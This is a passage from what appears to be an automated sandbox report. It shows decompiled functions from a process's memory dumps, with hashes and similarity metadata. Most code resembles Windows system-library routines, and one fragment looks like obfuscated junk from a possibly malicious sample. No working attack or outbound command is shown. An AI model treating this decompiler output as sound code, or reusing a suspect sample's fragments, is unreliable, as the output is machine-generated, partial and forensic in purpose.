                                                                                                                                    				intOrPtr _v16;
                                                                                                                                    				short _v42;
                                                                                                                                    				char _v48;
                                                                                                                                    				signed char* _t12;
                                                                                                                                    				intOrPtr _t18;
                                                                                                                                    				intOrPtr _t24;
                                                                                                                                    				intOrPtr _t25;
                                                                                                                                    				signed int _t26;
                                                                                                                                    
                                                                                                                                    				_t23 = __edx;
                                                                                                                                    				_v8 =  *0x4c2d360 ^ _t26;
                                                                                                                                    				_v16 = __ecx;
                                                                                                                                    				_v42 = 0x1c2b;
                                                                                                                                    				_v12 = __edx;
                                                                                                                                    				if(E04B57D50() == 0) {
                                                                                                                                    					_t12 = 0x7ffe0386;
                                                                                                                                    				} else {
                                                                                                                                    					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                                    				}
                                                                                                                                    				_push( &_v48);
                                                                                                                                    				_push(8);
                                                                                                                                    				_push(0x20402);
                                                                                                                                    				_push( *_t12 & 0x000000ff);
                                                                                                                                    				return E04B7B640(E04B79AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                                                                                                                                    			}














                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ed6104269488c0027f641e7dc8d4d56348e0b93c65a68c4222b5d0bdf677dbd1
                                                                                                                                    • Instruction ID: 909c6c65e04b7fc06eb1cf0d9735ca5c99378116c9ad5a9ce932ab4047d7b596
                                                                                                                                    • Opcode Fuzzy Hash: ed6104269488c0027f641e7dc8d4d56348e0b93c65a68c4222b5d0bdf677dbd1
                                                                                                                                    • Instruction Fuzzy Hash: 4CF0B470E047089FDB14EFB8D541B6EB7B4EF14304F108099E915EB390EA34EA00CB54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 36%
                                                                                                                                    			E04C08CD6(intOrPtr __ecx) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				intOrPtr _v12;
                                                                                                                                    				short _v38;
                                                                                                                                    				char _v44;
                                                                                                                                    				signed char* _t11;
                                                                                                                                    				intOrPtr _t17;
                                                                                                                                    				intOrPtr _t22;
                                                                                                                                    				intOrPtr _t23;
                                                                                                                                    				intOrPtr _t24;
                                                                                                                                    				signed int _t25;
                                                                                                                                    
                                                                                                                                    				_v8 =  *0x4c2d360 ^ _t25;
                                                                                                                                    				_v12 = __ecx;
                                                                                                                                    				_v38 = 0x1c2d;
                                                                                                                                    				if(E04B57D50() == 0) {
                                                                                                                                    					_t11 = 0x7ffe0386;
                                                                                                                                    				} else {
                                                                                                                                    					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                                    				}
                                                                                                                                    				_push( &_v44);
                                                                                                                                    				_push(0xffffffe4);
                                                                                                                                    				_push(0x402);
                                                                                                                                    				_push( *_t11 & 0x000000ff);
                                                                                                                                    				return E04B7B640(E04B79AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                                                                                                                    			}














                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 27546f0f4e6721398bc3ef52c245a674c3bc3fe0c7f7172a02cc542f67f6c9a0
                                                                                                                                    • Instruction ID: a2f4f5140e280b16c7017c0d53c1552bc2715a9b680d19dfbc0d62c391fa224d
                                                                                                                                    • Opcode Fuzzy Hash: 27546f0f4e6721398bc3ef52c245a674c3bc3fe0c7f7172a02cc542f67f6c9a0
                                                                                                                                    • Instruction Fuzzy Hash: E6F08270A05609AFDB04EBA9D946E6EB7B4EF18304F144199F916EB2D0EA34E900CB54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                    			E04B5746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                                                                                                                                    				signed int _t8;
                                                                                                                                    				void* _t10;
                                                                                                                                    				short* _t17;
                                                                                                                                    				void* _t19;
                                                                                                                                    				intOrPtr _t20;
                                                                                                                                    				void* _t21;
                                                                                                                                    
                                                                                                                                    				_t20 = __esi;
                                                                                                                                    				_t19 = __edi;
                                                                                                                                    				_t17 = __ebx;
                                                                                                                                    				if( *((char*)(_t21 - 0x25)) != 0) {
                                                                                                                                    					if(__ecx == 0) {
                                                                                                                                    						E04B4EB70(__ecx, 0x4c279a0);
                                                                                                                                    					} else {
                                                                                                                                    						asm("lock xadd [ecx], eax");
                                                                                                                                    						if((_t8 | 0xffffffff) == 0) {
                                                                                                                                    							_push( *((intOrPtr*)(__ecx + 4)));
                                                                                                                                    							E04B795D0();
                                                                                                                                    							L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                                                                                                                                    							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                                                                                                                                    							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					L10:
                                                                                                                                    				}
                                                                                                                                    				_t10 = _t19 + _t19;
                                                                                                                                    				if(_t20 >= _t10) {
                                                                                                                                    					if(_t19 != 0) {
                                                                                                                                    						 *_t17 = 0;
                                                                                                                                    						return 0;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				return _t10;
                                                                                                                                    				goto L10;
                                                                                                                                    			}










                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5ad6b60b69f3b27f8d321d70e9c34d6563007313a5a3a13b37e159800487daeb
                                                                                                                                    • Instruction ID: 4f8628771af1db845e1c3ec950ed3e4a607d1f000553aec03bcd920c65449a48
                                                                                                                                    • Opcode Fuzzy Hash: 5ad6b60b69f3b27f8d321d70e9c34d6563007313a5a3a13b37e159800487daeb
                                                                                                                                    • Instruction Fuzzy Hash: 2AF0B434700244AADF019B6CC480B79FFB1AF04314F0401E5DC51A7170FBA4F8029785
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 36%
                                                                                                                                    			E04C08B58(intOrPtr __ecx) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				intOrPtr _v20;
                                                                                                                                    				short _v46;
                                                                                                                                    				char _v52;
                                                                                                                                    				signed char* _t11;
                                                                                                                                    				intOrPtr _t17;
                                                                                                                                    				intOrPtr _t22;
                                                                                                                                    				intOrPtr _t23;
                                                                                                                                    				intOrPtr _t24;
                                                                                                                                    				signed int _t25;
                                                                                                                                    
                                                                                                                                    				_v8 =  *0x4c2d360 ^ _t25;
                                                                                                                                    				_v20 = __ecx;
                                                                                                                                    				_v46 = 0x1c26;
                                                                                                                                    				if(E04B57D50() == 0) {
                                                                                                                                    					_t11 = 0x7ffe0386;
                                                                                                                                    				} else {
                                                                                                                                    					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                                    				}
                                                                                                                                    				_push( &_v52);
                                                                                                                                    				_push(4);
                                                                                                                                    				_push(0x402);
                                                                                                                                    				_push( *_t11 & 0x000000ff);
                                                                                                                                    				return E04B7B640(E04B79AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                                                                                                                    			}














                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 418ea2dc6a3f668cb178bc8ab270e324f4ce2aa736571bcd641f1ca2ae2391e0
                                                                                                                                    • Instruction ID: a2f3845dd4fd9806e8838145c641243c7440f0abdd5fb12fbbdfc85404693f7f
                                                                                                                                    • Opcode Fuzzy Hash: 418ea2dc6a3f668cb178bc8ab270e324f4ce2aa736571bcd641f1ca2ae2391e0
                                                                                                                                    • Instruction Fuzzy Hash: 68F082B0A14258AFEB14EBA8D906E7EB3B4EF04304F544499BA15DB3D0EA74E900C798
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E04B34F2E(void* __ecx, char _a4) {
                                                                                                                                    				void* __esi;
                                                                                                                                    				void* __ebp;
                                                                                                                                    				void* _t17;
                                                                                                                                    				void* _t19;
                                                                                                                                    				void* _t20;
                                                                                                                                    				void* _t21;
                                                                                                                                    
                                                                                                                                    				_t18 = __ecx;
                                                                                                                                    				_t21 = __ecx;
                                                                                                                                    				if(__ecx == 0) {
                                                                                                                                    					L6:
                                                                                                                                    					__eflags = _a4;
                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                    						L8:
                                                                                                                                    						E04C088F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                                                                                                                    						L9:
                                                                                                                                    						return 0;
                                                                                                                                    					}
                                                                                                                                    					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                    						goto L9;
                                                                                                                                    					}
                                                                                                                                    					goto L8;
                                                                                                                                    				}
                                                                                                                                    				_t18 = __ecx + 0x30;
                                                                                                                                    				if(E04B5C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4b11030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                                                                                    					goto L6;
                                                                                                                                    				} else {
                                                                                                                                    					return 1;
                                                                                                                                    				}
                                                                                                                                    			}










                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ba979dd92e0663b5ffe24ffd715478cda5fe0cf8269d60407892e8d200f8f2f6
                                                                                                                                    • Instruction ID: 9e6f54f05b2925c07918d88810befa06cf962649eb6ca701344ac87ab393ec69
                                                                                                                                    • Opcode Fuzzy Hash: ba979dd92e0663b5ffe24ffd715478cda5fe0cf8269d60407892e8d200f8f2f6
                                                                                                                                    • Instruction Fuzzy Hash: 65F0E2369296948FEB71EB28C144B22B7E4EB087B8F4444F4D805C7921C724FC40C640
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.729908572.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c9d41a6cc97f2c89d4285e9fe8b2f6f0e7df3c9e642e8b00a7cb878e8a6f5e67
                                                                                                                                    • Instruction ID: 6f1ce797c560684e198c1e1ea42f634d09a62f2f607da552826d1c426674a569
                                                                                                                                    • Opcode Fuzzy Hash: c9d41a6cc97f2c89d4285e9fe8b2f6f0e7df3c9e642e8b00a7cb878e8a6f5e67
                                                                                                                                    • Instruction Fuzzy Hash: D7E09237208515EFCA60CB5DDC40A4AF3F0FF41374B254625E845E3690DB20FC118E60
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E04B6A185() {
                                                                                                                                    				void* __ecx;
                                                                                                                                    				intOrPtr* _t5;
                                                                                                                                    
                                                                                                                                    				if( *0x4c267e4 >= 0xa) {
                                                                                                                                    					if(_t5 < 0x4c26800 || _t5 >= 0x4c26900) {
                                                                                                                                    						return L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                                                                                                                                    					} else {
                                                                                                                                    						goto L1;
                                                                                                                                    					}
                                                                                                                                    				} else {
                                                                                                                                    					L1:
                                                                                                                                    					return E04B50010(0x4c267e0, _t5);
                                                                                                                                    				}
                                                                                                                                    			}






                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 46ce3180c58109e0dc6b6bd4d50a98ca4b5bd7760ba4e697720a9dddfec806ec
                                                                                                                                    • Instruction ID: 3b181c0d75a68baf55c28c81110974e9a69e77800247525ca30255cfd6e5fed3
                                                                                                                                    • Opcode Fuzzy Hash: 46ce3180c58109e0dc6b6bd4d50a98ca4b5bd7760ba4e697720a9dddfec806ec
                                                                                                                                    • Instruction Fuzzy Hash: 56D05BB136109056FA2D6710BF54B252213E7CAB18F304CDDF2476A5A0DDD8FCE49568
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E04B616E0(void* __edx, void* __eflags) {
                                                                                                                                    				void* __ecx;
                                                                                                                                    				void* _t3;
                                                                                                                                    
                                                                                                                                    				_t3 = E04B61710(0x4c267e0);
                                                                                                                                    				if(_t3 == 0) {
                                                                                                                                    					_t6 =  *[fs:0x30];
                                                                                                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                                                                                                                                    						goto L1;
                                                                                                                                    					} else {
                                                                                                                                    						return L04B54620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                                                                                                                                    					}
                                                                                                                                    				} else {
                                                                                                                                    					L1:
                                                                                                                                    					return _t3;
                                                                                                                                    				}
                                                                                                                                    			}






                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 431c6efdddb67c1620b38ee580394aba9fe33579c39dbab00349f8f929cf2974
                                                                                                                                    • Instruction ID: b4d2dd7c98faaaef79f9ba7b2513b1dc0cd8aaeadbca2d8cb14b155c89c2532f
                                                                                                                                    • Opcode Fuzzy Hash: 431c6efdddb67c1620b38ee580394aba9fe33579c39dbab00349f8f929cf2974
                                                                                                                                    • Instruction Fuzzy Hash: C0D0A7B120014056FA2D5B189804B142253DB80B89F3800DCF50B594D0CFB8FCA2E458
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 25%
                                                                                                                                    			E004157F1(void* __eax, void* __ebx, char __ecx, void* __esi) {
                                                                                                                                    
                                                                                                                                    				asm("scasb");
                                                                                                                                    				asm("xlatb");
                                                                                                                                    				 *0x2d1b6854 = __ecx;
                                                                                                                                    				asm("rcl ch, cl");
                                                                                                                                    				return __ecx;
                                                                                                                                    			}




                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.729908572.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: false
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E04B635A1(void* __eax, void* __ebx, void* __ecx) {
                                                                                                                                    				void* _t6;
                                                                                                                                    				void* _t10;
                                                                                                                                    				void* _t11;
                                                                                                                                    
                                                                                                                                    				_t10 = __ecx;
                                                                                                                                    				_t6 = __eax;
                                                                                                                                    				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                                                                                                                                    					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                                                                                                                                    				}
                                                                                                                                    				if( *((char*)(_t11 - 0x1a)) != 0) {
                                                                                                                                    					return E04B4EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                                                    				}
                                                                                                                                    				return _t6;
                                                                                                                                    			}







                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E04B3AD30(intOrPtr _a4) {
                                                                                                                                    
                                                                                                                                    				return L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                                                                                    			}




                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E04B636CC(void* __ecx) {
                                                                                                                                    
                                                                                                                                    				if(__ecx > 0x7fffffff) {
                                                                                                                                    					return 0;
                                                                                                                                    				} else {
                                                                                                                                    					return L04B54620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                                                                                                                    				}
                                                                                                                                    			}




                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E04B57D50() {
                                                                                                                                    				intOrPtr* _t3;
                                                                                                                                    
                                                                                                                                    				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                                                                                    				if(_t3 != 0) {
                                                                                                                                    					return  *_t3;
                                                                                                                                    				} else {
                                                                                                                                    					return _t3;
                                                                                                                                    				}
                                                                                                                                    			}





                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 349141c7ef0144f523edf691df862e50e5b152ef1e50c264a454be4521d207dc
                                                                                                                                    • Instruction ID: 4c7cb81d289207a637439796752011a48021c6c11e9d717aaa89027af5833270
                                                                                                                                    • Opcode Fuzzy Hash: 349141c7ef0144f523edf691df862e50e5b152ef1e50c264a454be4521d207dc
                                                                                                                                    • Instruction Fuzzy Hash: F390027220504842F14071598404E460019D7E0349F51C05AE0055698D9665DD65FAA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8d1ea8c10c06b5c720055a7f53faf2471161d4518a093b5ec3a47a632133c3d8
                                                                                                                                    • Instruction ID: 9cb13abb92a4ae96efd4c04a14fb933106bc85ce4e87697d4d73524af253d0b6
                                                                                                                                    • Opcode Fuzzy Hash: 8d1ea8c10c06b5c720055a7f53faf2471161d4518a093b5ec3a47a632133c3d8
                                                                                                                                    • Instruction Fuzzy Hash: 6A90027220144002F1407159C444A0B5009E7F0345F51C45AE0416558C8655D866E661
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1319efdcf66410423f74ce97ea4418b0a469f7eea96ca2965de29ced167e296a
                                                                                                                                    • Instruction ID: 27fa375efb700ecdf9112b442c7f6bb00fe4bfa6509e2dbbc10c4fcbeea280e0
                                                                                                                                    • Opcode Fuzzy Hash: 1319efdcf66410423f74ce97ea4418b0a469f7eea96ca2965de29ced167e296a
                                                                                                                                    • Instruction Fuzzy Hash: 3890026260500402F14071599418B060019D7E0245F51D05AE0015558DC699DA65BAE1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 56c43cdba292b0451c292a9477ff07fac2087b742b3c2f95c6a164e7b33aedcd
                                                                                                                                    • Instruction ID: 7b34bc31c6d3b15e65eaeb050d0fd94cbd1612a9fe3ec6fe74c6630c45319d30
                                                                                                                                    • Opcode Fuzzy Hash: 56c43cdba292b0451c292a9477ff07fac2087b742b3c2f95c6a164e7b33aedcd
                                                                                                                                    • Instruction Fuzzy Hash: E890027230100052B500B6999804E4A4109D7F0345B51D05EE4005558C8594D871A561
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 79d2b4a7c1aa80ae923aabdf66288b65ae4ff20657316b038524d3177e7d02c1
                                                                                                                                    • Instruction ID: d9997b244801c2295f9725a25b2609576aa7bec1a4f0610e08a92ba54824f2c3
                                                                                                                                    • Opcode Fuzzy Hash: 79d2b4a7c1aa80ae923aabdf66288b65ae4ff20657316b038524d3177e7d02c1
                                                                                                                                    • Instruction Fuzzy Hash: 3B90026224100802F1407159C414B07000AD7E0645F51C05AE0015558D8656D975BAF1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c4b05978af1f0242690eb37c53ba53c28c0c9804b9a1750ea0962d93ce0d1c04
                                                                                                                                    • Instruction ID: aa94ea34f2854ac81c3aac26655610f39fae3538e578e39ac5fff519037ffff9
                                                                                                                                    • Opcode Fuzzy Hash: c4b05978af1f0242690eb37c53ba53c28c0c9804b9a1750ea0962d93ce0d1c04
                                                                                                                                    • Instruction Fuzzy Hash: 2690026220504442F10075599408E060009D7E0249F51D05AE1055599DC675D861F571
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fcca8842bacfb885f0a8ecdb256d3c4cfd230cedd5f83249476a65b5598b3a7d
                                                                                                                                    • Instruction ID: d2676a8a671046e4b5bed48cbce2663bf2620ded0cf781e9d917be9659be61e6
                                                                                                                                    • Opcode Fuzzy Hash: fcca8842bacfb885f0a8ecdb256d3c4cfd230cedd5f83249476a65b5598b3a7d
